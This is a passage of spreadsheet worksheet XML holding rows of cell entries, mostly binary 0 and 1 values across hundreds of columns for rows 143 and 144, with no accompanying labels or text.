      <c r="JO143">
        <v>1</v>
      </c>
      <c r="JP143">
        <v>1</v>
      </c>
      <c r="JQ143">
        <v>0</v>
      </c>
      <c r="JR143">
        <v>0</v>
      </c>
      <c r="JS143">
        <v>1</v>
      </c>
      <c r="JT143">
        <v>1</v>
      </c>
      <c r="JU143">
        <v>0</v>
      </c>
      <c r="JV143">
        <v>0</v>
      </c>
      <c r="JW143">
        <v>1</v>
      </c>
      <c r="JX143">
        <v>0</v>
      </c>
      <c r="JY143">
        <v>0</v>
      </c>
      <c r="JZ143">
        <v>1</v>
      </c>
      <c r="KA143">
        <v>1</v>
      </c>
      <c r="KB143">
        <v>0</v>
      </c>
      <c r="KC143">
        <v>1</v>
      </c>
      <c r="KD143">
        <v>1</v>
      </c>
      <c r="KE143">
        <v>1</v>
      </c>
      <c r="KF143">
        <v>0</v>
      </c>
      <c r="KG143">
        <v>1</v>
      </c>
      <c r="KH143">
        <v>1</v>
      </c>
      <c r="KI143">
        <v>0</v>
      </c>
      <c r="KJ143">
        <v>1</v>
      </c>
      <c r="KK143">
        <v>0</v>
      </c>
      <c r="KL143">
        <v>0</v>
      </c>
      <c r="KM143">
        <v>1</v>
      </c>
      <c r="KN143">
        <v>0</v>
      </c>
      <c r="KO143">
        <v>0</v>
      </c>
      <c r="KP143">
        <v>0</v>
      </c>
      <c r="KQ143">
        <v>1</v>
      </c>
      <c r="KR143">
        <v>1</v>
      </c>
      <c r="KS143">
        <v>1</v>
      </c>
      <c r="KT143">
        <v>1</v>
      </c>
      <c r="KU143">
        <v>1</v>
      </c>
      <c r="KV143">
        <v>1</v>
      </c>
      <c r="KW143">
        <v>1</v>
      </c>
      <c r="KX143">
        <v>0</v>
      </c>
      <c r="KY143">
        <v>0</v>
      </c>
      <c r="KZ143">
        <v>1</v>
      </c>
      <c r="LA143">
        <v>0</v>
      </c>
      <c r="LB143">
        <v>0</v>
      </c>
      <c r="LC143">
        <v>0</v>
      </c>
      <c r="LD143">
        <v>0</v>
      </c>
      <c r="LE143">
        <v>0</v>
      </c>
      <c r="LF143">
        <v>0</v>
      </c>
      <c r="LG143">
        <v>0</v>
      </c>
      <c r="LH143">
        <v>1</v>
      </c>
      <c r="LI143">
        <v>1</v>
      </c>
      <c r="LJ143">
        <v>1</v>
      </c>
      <c r="LK143">
        <v>0</v>
      </c>
      <c r="LL143">
        <v>0</v>
      </c>
      <c r="LM143">
        <v>1</v>
      </c>
      <c r="LN143">
        <v>1</v>
      </c>
      <c r="LO143">
        <v>1</v>
      </c>
      <c r="LP143">
        <v>1</v>
      </c>
      <c r="LQ143">
        <v>0</v>
      </c>
      <c r="LR143">
        <v>1</v>
      </c>
      <c r="LS143">
        <v>1</v>
      </c>
      <c r="LT143">
        <v>0</v>
      </c>
      <c r="LU143">
        <v>0</v>
      </c>
      <c r="LV143">
        <v>1</v>
      </c>
      <c r="LW143">
        <v>1</v>
      </c>
      <c r="LX143">
        <v>0</v>
      </c>
      <c r="LY143">
        <v>0</v>
      </c>
      <c r="LZ143">
        <v>0</v>
      </c>
      <c r="MA143">
        <v>0</v>
      </c>
      <c r="MB143">
        <v>0</v>
      </c>
      <c r="MC143">
        <v>0</v>
      </c>
      <c r="MD143">
        <v>1</v>
      </c>
      <c r="ME143">
        <v>0</v>
      </c>
      <c r="MF143">
        <v>1</v>
      </c>
      <c r="MG143">
        <v>0</v>
      </c>
      <c r="MH143">
        <v>1</v>
      </c>
      <c r="MI143">
        <v>0</v>
      </c>
      <c r="MJ143">
        <v>1</v>
      </c>
      <c r="MK143">
        <v>1</v>
      </c>
      <c r="ML143">
        <v>1</v>
      </c>
      <c r="MM143">
        <v>0</v>
      </c>
      <c r="MN143">
        <v>1</v>
      </c>
      <c r="MO143">
        <v>0</v>
      </c>
      <c r="MP143">
        <v>0</v>
      </c>
      <c r="MQ143">
        <v>0</v>
      </c>
      <c r="MR143">
        <v>1</v>
      </c>
      <c r="MS143">
        <v>0</v>
      </c>
      <c r="MT143">
        <v>0</v>
      </c>
      <c r="MU143">
        <v>0</v>
      </c>
      <c r="MV143">
        <v>0</v>
      </c>
      <c r="MW143">
        <v>0</v>
      </c>
      <c r="MX143">
        <v>1</v>
      </c>
      <c r="MY143">
        <v>0</v>
      </c>
      <c r="MZ143">
        <v>1</v>
      </c>
      <c r="NA143">
        <v>1</v>
      </c>
      <c r="NB143">
        <v>0</v>
      </c>
      <c r="NC143">
        <v>0</v>
      </c>
      <c r="ND143">
        <v>1</v>
      </c>
      <c r="NE143">
        <v>1</v>
      </c>
      <c r="NF143">
        <v>1</v>
      </c>
      <c r="NG143">
        <v>0</v>
      </c>
      <c r="NH143">
        <v>0</v>
      </c>
      <c r="NI143">
        <v>0</v>
      </c>
      <c r="NJ143">
        <v>1</v>
      </c>
      <c r="NK143">
        <v>1</v>
      </c>
      <c r="NL143">
        <v>0</v>
      </c>
      <c r="NM143">
        <v>0</v>
      </c>
      <c r="NN143">
        <v>0</v>
      </c>
      <c r="NO143">
        <v>0</v>
      </c>
      <c r="NP143">
        <v>1</v>
      </c>
      <c r="NQ143">
        <v>0</v>
      </c>
      <c r="NR143">
        <v>1</v>
      </c>
      <c r="NS143">
        <v>1</v>
      </c>
      <c r="NT143">
        <v>1</v>
      </c>
      <c r="NU143">
        <v>1</v>
      </c>
      <c r="NV143">
        <v>1</v>
      </c>
      <c r="NW143">
        <v>1</v>
      </c>
      <c r="NX143">
        <v>1</v>
      </c>
      <c r="NY143">
        <v>1</v>
      </c>
      <c r="NZ143">
        <v>1</v>
      </c>
      <c r="OA143">
        <v>0</v>
      </c>
      <c r="OB143">
        <v>1</v>
      </c>
      <c r="OC143">
        <v>1</v>
      </c>
      <c r="OD143">
        <v>0</v>
      </c>
      <c r="OE143">
        <v>1</v>
      </c>
      <c r="OF143">
        <v>0</v>
      </c>
      <c r="OG143">
        <v>1</v>
      </c>
      <c r="OH143">
        <v>0</v>
      </c>
      <c r="OI143">
        <v>0</v>
      </c>
      <c r="OJ143">
        <v>1</v>
      </c>
      <c r="OK143">
        <v>0</v>
      </c>
      <c r="OL143">
        <v>1</v>
      </c>
      <c r="OM143">
        <v>0</v>
      </c>
      <c r="ON143">
        <v>0</v>
      </c>
      <c r="OO143">
        <v>0</v>
      </c>
      <c r="OP143">
        <v>0</v>
      </c>
      <c r="OQ143">
        <v>0</v>
      </c>
      <c r="OR143">
        <v>1</v>
      </c>
      <c r="OS143">
        <v>1</v>
      </c>
      <c r="OT143">
        <v>0</v>
      </c>
      <c r="OU143">
        <v>0</v>
      </c>
      <c r="OV143">
        <v>0</v>
      </c>
      <c r="OW143">
        <v>1</v>
      </c>
      <c r="OX143">
        <v>1</v>
      </c>
      <c r="OY143">
        <v>1</v>
      </c>
      <c r="OZ143">
        <v>0</v>
      </c>
      <c r="PA143">
        <v>0</v>
      </c>
      <c r="PB143">
        <v>0</v>
      </c>
      <c r="PC143">
        <v>0</v>
      </c>
      <c r="PD143">
        <v>0</v>
      </c>
      <c r="PE143">
        <v>0</v>
      </c>
      <c r="PF143">
        <v>1</v>
      </c>
      <c r="PG143">
        <v>1</v>
      </c>
      <c r="PH143">
        <v>0</v>
      </c>
      <c r="PI143">
        <v>0</v>
      </c>
      <c r="PJ143">
        <v>0</v>
      </c>
      <c r="PK143">
        <v>1</v>
      </c>
      <c r="PL143">
        <v>1</v>
      </c>
      <c r="PM143">
        <v>0</v>
      </c>
      <c r="PN143">
        <v>0</v>
      </c>
      <c r="PO143">
        <v>0</v>
      </c>
      <c r="PP143">
        <v>1</v>
      </c>
      <c r="PQ143">
        <v>0</v>
      </c>
      <c r="PR143">
        <v>1</v>
      </c>
      <c r="PS143">
        <v>1</v>
      </c>
      <c r="PT143">
        <v>1</v>
      </c>
      <c r="PU143">
        <v>1</v>
      </c>
      <c r="PV143">
        <v>1</v>
      </c>
      <c r="PW143">
        <v>1</v>
      </c>
      <c r="PX143">
        <v>1</v>
      </c>
      <c r="PY143">
        <v>0</v>
      </c>
      <c r="PZ143">
        <v>0</v>
      </c>
      <c r="QA143">
        <v>0</v>
      </c>
      <c r="QB143">
        <v>1</v>
      </c>
      <c r="QC143">
        <v>1</v>
      </c>
      <c r="QD143">
        <v>1</v>
      </c>
      <c r="QE143">
        <v>1</v>
      </c>
      <c r="QF143">
        <v>0</v>
      </c>
      <c r="QG143">
        <v>0</v>
      </c>
      <c r="QH143">
        <v>0</v>
      </c>
      <c r="QI143">
        <v>0</v>
      </c>
      <c r="QJ143">
        <v>0</v>
      </c>
      <c r="QK143">
        <v>1</v>
      </c>
      <c r="QL143">
        <v>0</v>
      </c>
      <c r="QM143">
        <v>0</v>
      </c>
      <c r="QN143">
        <v>0</v>
      </c>
      <c r="QO143">
        <v>0</v>
      </c>
      <c r="QP143">
        <v>1</v>
      </c>
      <c r="QQ143">
        <v>1</v>
      </c>
      <c r="QR143">
        <v>1</v>
      </c>
      <c r="QS143">
        <v>1</v>
      </c>
      <c r="QT143">
        <v>1</v>
      </c>
      <c r="QU143">
        <v>0</v>
      </c>
      <c r="QV143">
        <v>1</v>
      </c>
      <c r="QW143">
        <v>1</v>
      </c>
      <c r="QX143">
        <v>0</v>
      </c>
      <c r="QY143">
        <v>0</v>
      </c>
      <c r="QZ143">
        <v>1</v>
      </c>
      <c r="RA143">
        <v>1</v>
      </c>
      <c r="RB143">
        <v>1</v>
      </c>
      <c r="RC143">
        <v>1</v>
      </c>
      <c r="RD143">
        <v>0</v>
      </c>
      <c r="RE143">
        <v>1</v>
      </c>
      <c r="RF143">
        <v>1</v>
      </c>
      <c r="RG143">
        <v>0</v>
      </c>
      <c r="RH143">
        <v>0</v>
      </c>
      <c r="RI143">
        <v>0</v>
      </c>
      <c r="RJ143">
        <v>0</v>
      </c>
      <c r="RK143">
        <v>0</v>
      </c>
      <c r="RL143">
        <v>0</v>
      </c>
      <c r="RM143">
        <v>1</v>
      </c>
      <c r="RN143">
        <v>0</v>
      </c>
      <c r="RO143">
        <v>0</v>
      </c>
      <c r="RP143">
        <v>0</v>
      </c>
      <c r="RQ143">
        <v>0</v>
      </c>
      <c r="RR143">
        <v>1</v>
      </c>
      <c r="RS143">
        <v>0</v>
      </c>
      <c r="RT143">
        <v>0</v>
      </c>
      <c r="RU143">
        <v>0</v>
      </c>
      <c r="RV143">
        <v>0</v>
      </c>
      <c r="RW143">
        <v>0</v>
      </c>
      <c r="RX143">
        <v>0</v>
      </c>
      <c r="RY143">
        <v>0</v>
      </c>
      <c r="RZ143">
        <v>0</v>
      </c>
      <c r="SA143">
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A144" s="6" t="s">
        <v>4182</v>
      </c>
      <c r="B144">
        <v>15</v>
      </c>
      <c r="C144">
        <v>0</v>
      </c>
      <c r="D144">
        <v>0</v>
      </c>
      <c r="E144">
        <v>0</v>
      </c>
      <c r="F144">
        <v>0</v>
      </c>
      <c r="G144">
        <v>0</v>
      </c>
      <c r="H144">
        <v>0</v>
      </c>
      <c r="I144">
        <v>0</v>
      </c>
      <c r="J144">
        <v>0</v>
      </c>
      <c r="K144">
        <v>0</v>
      </c>
      <c r="L144">
        <v>0</v>
      </c>
      <c r="M144">
        <v>0</v>
      </c>
      <c r="N144">
        <v>0</v>
      </c>
      <c r="O144">
        <v>0</v>
      </c>
      <c r="P144">
        <v>0</v>
      </c>
      <c r="Q144">
        <v>0</v>
      </c>
      <c r="R144">
        <v>0</v>
      </c>
      <c r="S144">
        <v>0</v>
      </c>
      <c r="T144">
        <v>0</v>
      </c>
      <c r="U144">
        <v>0</v>
      </c>
      <c r="V144">
        <v>0</v>
      </c>
      <c r="W144">
        <v>0</v>
      </c>
      <c r="X144">
        <v>0</v>
      </c>
      <c r="Y144">
        <v>0</v>
      </c>
      <c r="Z144">
        <v>0</v>
      </c>
      <c r="AA144">
        <v>0</v>
      </c>
      <c r="AB144">
        <v>0</v>
      </c>
      <c r="AC144">
        <v>0</v>
      </c>
      <c r="AD144">
        <v>0</v>
      </c>
      <c r="AE144">
        <v>0</v>
      </c>
      <c r="AF144">
        <v>0</v>
      </c>
      <c r="AG144">
        <v>0</v>
      </c>
      <c r="AH144">
        <v>0</v>
      </c>
      <c r="AI144">
        <v>0</v>
      </c>
      <c r="AJ144">
        <v>0</v>
      </c>
      <c r="AK144">
        <v>0</v>
      </c>
      <c r="AL144">
        <v>0</v>
      </c>
      <c r="AM144">
        <v>0</v>
      </c>
      <c r="AN144">
        <v>0</v>
      </c>
      <c r="AO144">
        <v>0</v>
      </c>
      <c r="AP144">
        <v>0</v>
      </c>
      <c r="AQ144">
        <v>0</v>
      </c>
      <c r="AR144">
        <v>1</v>
      </c>
      <c r="AS144">
        <v>0</v>
      </c>
      <c r="AT144">
        <v>0</v>
      </c>
      <c r="AU144">
        <v>0</v>
      </c>
      <c r="AV144">
        <v>0</v>
      </c>
      <c r="AW144">
        <v>0</v>
      </c>
      <c r="AX144">
        <v>0</v>
      </c>
      <c r="AY144">
        <v>0</v>
      </c>
      <c r="AZ144">
        <v>0</v>
      </c>
      <c r="BA144">
        <v>0</v>
      </c>
      <c r="BB144">
        <v>0</v>
      </c>
      <c r="BC144">
        <v>0</v>
      </c>
      <c r="BD144">
        <v>0</v>
      </c>
      <c r="BE144">
        <v>0</v>
      </c>
      <c r="BF144">
        <v>0</v>
      </c>
      <c r="BG144">
        <v>0</v>
      </c>
      <c r="BH144">
        <v>0</v>
      </c>
      <c r="BI144">
        <v>0</v>
      </c>
      <c r="BJ144">
        <v>0</v>
      </c>
      <c r="BK144">
        <v>0</v>
      </c>
      <c r="BL144">
        <v>0</v>
      </c>
      <c r="BM144">
        <v>0</v>
      </c>
      <c r="BN144">
        <v>0</v>
      </c>
      <c r="BO144">
        <v>0</v>
      </c>
      <c r="BP144">
        <v>0</v>
      </c>
      <c r="BQ144">
        <v>0</v>
      </c>
      <c r="BR144">
        <v>0</v>
      </c>
      <c r="BS144">
        <v>0</v>
      </c>
      <c r="BT144">
        <v>0</v>
      </c>
      <c r="BU144">
        <v>0</v>
      </c>
      <c r="BV144">
        <v>0</v>
      </c>
      <c r="BW144">
        <v>0</v>
      </c>
      <c r="BX144">
        <v>0</v>
      </c>
      <c r="BY144">
        <v>0</v>
      </c>
      <c r="BZ144">
        <v>0</v>
      </c>
      <c r="CA144">
        <v>0</v>
      </c>
      <c r="CB144">
        <v>0</v>
      </c>
      <c r="CC144">
        <v>0</v>
      </c>
      <c r="CD144">
        <v>1</v>
      </c>
      <c r="CE144">
        <v>0</v>
      </c>
      <c r="CF144">
        <v>0</v>
      </c>
      <c r="CG144">
        <v>0</v>
      </c>
      <c r="CH144">
        <v>0</v>
      </c>
      <c r="CI144">
        <v>0</v>
      </c>
      <c r="CJ144">
        <v>0</v>
      </c>
      <c r="CK144">
        <v>0</v>
      </c>
      <c r="CL144">
        <v>0</v>
      </c>
      <c r="CM144">
        <v>0</v>
      </c>
      <c r="CN144">
        <v>0</v>
      </c>
      <c r="CO144">
        <v>0</v>
      </c>
      <c r="CP144">
        <v>0</v>
      </c>
      <c r="CQ144">
        <v>0</v>
      </c>
      <c r="CR144">
        <v>0</v>
      </c>
      <c r="CS144">
        <v>0</v>
      </c>
      <c r="CT144">
        <v>0</v>
      </c>
      <c r="CU144">
        <v>0</v>
      </c>
      <c r="CV144">
        <v>0</v>
      </c>
      <c r="CW144">
        <v>0</v>
      </c>
      <c r="CX144">
        <v>0</v>
      </c>
      <c r="CY144">
        <v>0</v>
      </c>
      <c r="CZ144">
        <v>0</v>
      </c>
      <c r="DA144">
        <v>0</v>
      </c>
      <c r="DB144">
        <v>0</v>
      </c>
      <c r="DC144">
        <v>0</v>
      </c>
      <c r="DD144">
        <v>0</v>
      </c>
      <c r="DE144">
        <v>0</v>
      </c>
      <c r="DF144">
        <v>0</v>
      </c>
      <c r="DG144">
        <v>0</v>
      </c>
      <c r="DH144">
        <v>0</v>
      </c>
      <c r="DI144">
        <v>0</v>
      </c>
      <c r="DJ144">
        <v>0</v>
      </c>
      <c r="DK144">
        <v>0</v>
      </c>
      <c r="DL144">
        <v>0</v>
      </c>
      <c r="DM144">
        <v>0</v>
      </c>
      <c r="DN144">
        <v>0</v>
      </c>
      <c r="DO144">
        <v>0</v>
      </c>
      <c r="DP144">
        <v>0</v>
      </c>
      <c r="DQ144">
        <v>0</v>
      </c>
      <c r="DR144">
        <v>0</v>
      </c>
      <c r="DS144">
        <v>0</v>
      </c>
      <c r="DT144">
        <v>0</v>
      </c>
      <c r="DU144">
        <v>0</v>
      </c>
      <c r="DV144">
        <v>0</v>
      </c>
      <c r="DW144">
        <v>0</v>
      </c>
      <c r="DX144">
        <v>0</v>
      </c>
      <c r="DY144">
        <v>0</v>
      </c>
      <c r="DZ144">
        <v>0</v>
      </c>
      <c r="EA144">
        <v>0</v>
      </c>
      <c r="EB144">
        <v>0</v>
      </c>
      <c r="EC144">
        <v>0</v>
      </c>
      <c r="ED144">
        <v>0</v>
      </c>
      <c r="EE144">
        <v>0</v>
      </c>
      <c r="EF144">
        <v>0</v>
      </c>
      <c r="EG144">
        <v>0</v>
      </c>
      <c r="EH144">
        <v>0</v>
      </c>
      <c r="EI144">
        <v>0</v>
      </c>
      <c r="EJ144">
        <v>0</v>
      </c>
      <c r="EK144">
        <v>0</v>
      </c>
      <c r="EL144">
        <v>0</v>
      </c>
      <c r="EM144">
        <v>0</v>
      </c>
      <c r="EN144">
        <v>0</v>
      </c>
      <c r="EO144">
        <v>0</v>
      </c>
      <c r="EP144">
        <v>0</v>
      </c>
      <c r="EQ144">
        <v>0</v>
      </c>
      <c r="ER144">
        <v>0</v>
      </c>
      <c r="ES144">
        <v>0</v>
      </c>
      <c r="ET144">
        <v>0</v>
      </c>
      <c r="EU144">
        <v>0</v>
      </c>
      <c r="EV144">
        <v>0</v>
      </c>
      <c r="EW144">
        <v>0</v>
      </c>
      <c r="EX144">
        <v>0</v>
      </c>
      <c r="EY144">
        <v>0</v>
      </c>
      <c r="EZ144">
        <v>0</v>
      </c>
      <c r="FA144">
        <v>0</v>
      </c>
      <c r="FB144">
        <v>0</v>
      </c>
      <c r="FC144">
        <v>1</v>
      </c>
      <c r="FD144">
        <v>0</v>
      </c>
      <c r="FE144">
        <v>0</v>
      </c>
      <c r="FF144">
        <v>0</v>
      </c>
      <c r="FG144">
        <v>0</v>
      </c>
      <c r="FH144">
        <v>0</v>
      </c>
      <c r="FI144">
        <v>0</v>
      </c>
      <c r="FJ144">
        <v>0</v>
      </c>
      <c r="FK144">
        <v>0</v>
      </c>
      <c r="FL144">
        <v>0</v>
      </c>
      <c r="FM144">
        <v>0</v>
      </c>
      <c r="FN144">
        <v>0</v>
      </c>
      <c r="FO144">
        <v>0</v>
      </c>
      <c r="FP144">
        <v>0</v>
      </c>
      <c r="FQ144">
        <v>0</v>
      </c>
      <c r="FR144">
        <v>0</v>
      </c>
      <c r="FS144">
        <v>0</v>
      </c>
      <c r="FT144">
        <v>0</v>
      </c>
      <c r="FU144">
        <v>0</v>
      </c>
      <c r="FV144">
        <v>0</v>
      </c>
      <c r="FW144">
        <v>0</v>
      </c>
      <c r="FX144">
        <v>0</v>
      </c>
      <c r="FY144">
        <v>0</v>
      </c>
      <c r="FZ144">
        <v>0</v>
      </c>
      <c r="GA144">
        <v>0</v>
      </c>
      <c r="GB144">
        <v>0</v>
      </c>
      <c r="GC144">
        <v>0</v>
      </c>
      <c r="GD144">
        <v>0</v>
      </c>
      <c r="GE144">
        <v>0</v>
      </c>
      <c r="GF144">
        <v>1</v>
      </c>
      <c r="GG144">
        <v>0</v>
      </c>
      <c r="GH144">
        <v>0</v>
      </c>
      <c r="GI144">
        <v>0</v>
      </c>
      <c r="GJ144">
        <v>1</v>
      </c>
      <c r="GK144">
        <v>0</v>
      </c>
      <c r="GL144">
        <v>0</v>
      </c>
      <c r="GM144">
        <v>0</v>
      </c>
      <c r="GN144">
        <v>0</v>
      </c>
      <c r="GO144">
        <v>0</v>
      </c>
      <c r="GP144">
        <v>0</v>
      </c>
      <c r="GQ144">
        <v>0</v>
      </c>
      <c r="GR144">
        <v>0</v>
      </c>
      <c r="GS144">
        <v>0</v>
      </c>
      <c r="GT144">
        <v>0</v>
      </c>
      <c r="GU144">
        <v>0</v>
      </c>
      <c r="GV144">
        <v>0</v>
      </c>
      <c r="GW144">
        <v>0</v>
      </c>
      <c r="GX144">
        <v>0</v>
      </c>
      <c r="GY144">
        <v>0</v>
      </c>
      <c r="GZ144">
        <v>0</v>
      </c>
      <c r="HA144">
        <v>0</v>
      </c>
      <c r="HB144">
        <v>0</v>
      </c>
      <c r="HC144">
        <v>0</v>
      </c>
      <c r="HD144">
        <v>0</v>
      </c>
      <c r="HE144">
        <v>0</v>
      </c>
      <c r="HF144">
        <v>0</v>
      </c>
      <c r="HG144">
        <v>0</v>
      </c>
      <c r="HH144">
        <v>0</v>
      </c>
      <c r="HI144">
        <v>0</v>
      </c>
      <c r="HJ144">
        <v>0</v>
      </c>
      <c r="HK144">
        <v>0</v>
      </c>
      <c r="HL144">
        <v>0</v>
      </c>
      <c r="HM144">
        <v>0</v>
      </c>
      <c r="HN144">
        <v>0</v>
      </c>
      <c r="HO144">
        <v>0</v>
      </c>
      <c r="HP144">
        <v>0</v>
      </c>
      <c r="HQ144">
        <v>0</v>
      </c>
      <c r="HR144">
        <v>0</v>
      </c>
      <c r="HS144">
        <v>0</v>
      </c>
      <c r="HT144">
        <v>0</v>
      </c>
      <c r="HU144">
        <v>0</v>
      </c>
      <c r="HV144">
        <v>0</v>
      </c>
      <c r="HW144">
        <v>0</v>
      </c>
      <c r="HX144">
        <v>0</v>
      </c>
      <c r="HY144">
        <v>1</v>
      </c>
      <c r="HZ144">
        <v>0</v>
      </c>
      <c r="IA144">
        <v>1</v>
      </c>
      <c r="IB144">
        <v>0</v>
      </c>
      <c r="IC144">
        <v>0</v>
      </c>
      <c r="ID144">
        <v>0</v>
      </c>
      <c r="IE144">
        <v>0</v>
      </c>
      <c r="IF144">
        <v>0</v>
      </c>
      <c r="IG144">
        <v>0</v>
      </c>
      <c r="IH144">
        <v>0</v>
      </c>
      <c r="II144">
        <v>0</v>
      </c>
      <c r="IJ144">
        <v>0</v>
      </c>
      <c r="IK144">
        <v>0</v>
      </c>
      <c r="IL144">
        <v>0</v>
      </c>
      <c r="IM144">
        <v>0</v>
      </c>
      <c r="IN144">
        <v>0</v>
      </c>
      <c r="IO144">
        <v>0</v>
      </c>
      <c r="IP144">
        <v>0</v>
      </c>
      <c r="IQ144">
        <v>0</v>
      </c>
      <c r="IR144">
        <v>0</v>
      </c>
      <c r="IS144">
        <v>0</v>
      </c>
      <c r="IT144">
        <v>0</v>
      </c>
      <c r="IU144">
        <v>0</v>
      </c>
      <c r="IV144">
        <v>0</v>
      </c>
      <c r="IW144">
        <v>0</v>
      </c>
      <c r="IX144">
        <v>0</v>
      </c>
      <c r="IY144">
        <v>0</v>
      </c>
      <c r="IZ144">
        <v>0</v>
      </c>
      <c r="JA144">
        <v>0</v>
      </c>
      <c r="JB144">
        <v>0</v>
      </c>
      <c r="JC144">
        <v>0</v>
      </c>
      <c r="JD144">
        <v>0</v>
      </c>
      <c r="JE144">
        <v>1</v>
      </c>
      <c r="JF144">
        <v>0</v>
      </c>
      <c r="JG144">
        <v>0</v>
      </c>
      <c r="JH144">
        <v>0</v>
      </c>
      <c r="JI144">
        <v>0</v>
      </c>
      <c r="JJ144">
        <v>0</v>
      </c>
      <c r="JK144">
        <v>0</v>
      </c>
      <c r="JL144">
        <v>0</v>
      </c>
      <c r="JM144">
        <v>0</v>
      </c>
      <c r="JN144">
        <v>0</v>
      </c>
      <c r="JO144">
        <v>0</v>
      </c>
      <c r="JP144">
        <v>0</v>
      </c>
      <c r="JQ144">
        <v>1</v>
      </c>
      <c r="JR144">
        <v>0</v>
      </c>
      <c r="JS144">
        <v>0</v>
      </c>
      <c r="JT144">
        <v>0</v>
      </c>
      <c r="JU144">
        <v>0</v>
      </c>
      <c r="JV144">
        <v>0</v>
      </c>
      <c r="JW144">
        <v>0</v>
      </c>
      <c r="JX144">
        <v>0</v>
      </c>
      <c r="JY144">
        <v>0</v>
      </c>
      <c r="JZ144">
        <v>0</v>
      </c>
      <c r="KA144">
        <v>0</v>
      </c>
      <c r="KB144">
        <v>0</v>
      </c>
      <c r="KC144">
        <v>0</v>
      </c>
      <c r="KD144">
        <v>0</v>
      </c>
      <c r="KE144">
        <v>0</v>
      </c>
      <c r="KF144">
        <v>0</v>
      </c>
      <c r="KG144">
        <v>0</v>
      </c>
      <c r="KH144">
        <v>0</v>
      </c>
      <c r="KI144">
        <v>0</v>
      </c>
      <c r="KJ144">
        <v>0</v>
      </c>
      <c r="KK144">
        <v>0</v>
      </c>
      <c r="KL144">
        <v>0</v>
      </c>
      <c r="KM144">
        <v>0</v>
      </c>
      <c r="KN144">
        <v>0</v>
      </c>
      <c r="KO144">
        <v>0</v>
      </c>
      <c r="KP144">
        <v>0</v>
      </c>
      <c r="KQ144">
        <v>0</v>
      </c>
      <c r="KR144">
        <v>0</v>
      </c>
      <c r="KS144">
        <v>0</v>
      </c>
      <c r="KT144">
        <v>0</v>
      </c>
      <c r="KU144">
        <v>0</v>
      </c>
      <c r="KV144">
        <v>0</v>
      </c>
      <c r="KW144">
        <v>0</v>
      </c>
      <c r="KX144">
        <v>0</v>
      </c>
      <c r="KY144">
        <v>0</v>
      </c>
      <c r="KZ144">
        <v>0</v>
      </c>
      <c r="LA144">
        <v>0</v>
      </c>
      <c r="LB144">
        <v>0</v>
      </c>
      <c r="LC144">
        <v>0</v>
      </c>
      <c r="LD144">
        <v>0</v>
      </c>
      <c r="LE144">
        <v>0</v>
      </c>
      <c r="LF144">
        <v>0</v>
      </c>
      <c r="LG144">
        <v>0</v>
      </c>
      <c r="LH144">
        <v>0</v>
      </c>
      <c r="LI144">
        <v>0</v>
      </c>
      <c r="LJ144">
        <v>0</v>
      </c>
      <c r="LK144">
        <v>1</v>
      </c>
      <c r="LL144">
        <v>0</v>
      </c>
      <c r="LM144">
        <v>0</v>
      </c>
      <c r="LN144">
        <v>0</v>
      </c>
      <c r="LO144">
        <v>0</v>
      </c>
      <c r="LP144">
        <v>0</v>
      </c>
      <c r="LQ144">
        <v>0</v>
      </c>
      <c r="LR144">
        <v>1</v>
      </c>
      <c r="LS144">
        <v>0</v>
      </c>
      <c r="LT144">
        <v>0</v>
      </c>
      <c r="LU144">
        <v>0</v>
      </c>
      <c r="LV144">
        <v>0</v>
      </c>
      <c r="LW144">
        <v>0</v>
      </c>
      <c r="LX144">
        <v>1</v>
      </c>
      <c r="LY144">
        <v>0</v>
      </c>
      <c r="LZ144">
        <v>0</v>
      </c>
      <c r="MA144">
        <v>0</v>
      </c>
      <c r="MB144">
        <v>0</v>
      </c>
      <c r="MC144">
        <v>0</v>
      </c>
      <c r="MD144">
        <v>0</v>
      </c>
      <c r="ME144">
        <v>0</v>
      </c>
      <c r="MF144">
        <v>0</v>
      </c>
      <c r="MG144">
        <v>0</v>
      </c>
      <c r="MH144">
        <v>0</v>
      </c>
      <c r="MI144">
        <v>0</v>
      </c>
      <c r="MJ144">
        <v>0</v>
      </c>
      <c r="MK144">
        <v>0</v>
      </c>
      <c r="ML144">
        <v>0</v>
      </c>
      <c r="MM144">
        <v>0</v>
      </c>
      <c r="MN144">
        <v>0</v>
      </c>
      <c r="MO144">
        <v>0</v>
      </c>
      <c r="MP144">
        <v>0</v>
      </c>
      <c r="MQ144">
        <v>1</v>
      </c>
      <c r="MR144">
        <v>0</v>
      </c>
      <c r="MS144">
        <v>0</v>
      </c>
      <c r="MT144">
        <v>0</v>
      </c>
      <c r="MU144">
        <v>0</v>
      </c>
      <c r="MV144">
        <v>1</v>
      </c>
      <c r="MW144">
        <v>0</v>
      </c>
      <c r="MX144">
        <v>0</v>
      </c>
      <c r="MY144">
        <v>0</v>
      </c>
      <c r="MZ144">
        <v>0</v>
      </c>
      <c r="NA144">
        <v>0</v>
      </c>
      <c r="NB144">
        <v>0</v>
      </c>
      <c r="NC144">
        <v>0</v>
      </c>
      <c r="ND144">
        <v>0</v>
      </c>
      <c r="NE144">
        <v>0</v>
      </c>
      <c r="NF144">
        <v>0</v>
      </c>
      <c r="NG144">
        <v>0</v>
      </c>
      <c r="NH144">
        <v>0</v>
      </c>
      <c r="NI144">
        <v>0</v>
      </c>
      <c r="NJ144">
        <v>0</v>
      </c>
      <c r="NK144">
        <v>0</v>
      </c>
      <c r="NL144">
        <v>0</v>
      </c>
      <c r="NM144">
        <v>0</v>
      </c>
      <c r="NN144">
        <v>0</v>
      </c>
      <c r="NO144">
        <v>0</v>
      </c>
      <c r="NP144">
        <v>0</v>
      </c>
      <c r="NQ144">
        <v>0</v>
      </c>
      <c r="NR144">
        <v>0</v>
      </c>
      <c r="NS144">
        <v>0</v>
      </c>
      <c r="NT144">
        <v>0</v>
      </c>
      <c r="NU144">
        <v>0</v>
      </c>
      <c r="NV144">
        <v>0</v>
      </c>
      <c r="NW144">
        <v>0</v>
      </c>
      <c r="NX144">
        <v>0</v>
      </c>
      <c r="NY144">
        <v>0</v>
      </c>
      <c r="NZ144">
        <v>0</v>
      </c>
      <c r="OA144">
        <v>0</v>
      </c>
      <c r="OB144">
        <v>0</v>
      </c>
      <c r="OC144">
        <v>0</v>
      </c>
      <c r="OD144">
        <v>0</v>
      </c>
      <c r="OE144">
        <v>0</v>
      </c>
      <c r="OF144">
        <v>0</v>
      </c>
      <c r="OG144">
        <v>0</v>
      </c>
      <c r="OH144">
        <v>0</v>
      </c>
      <c r="OI144">
        <v>0</v>
      </c>
      <c r="OJ144">
        <v>0</v>
      </c>
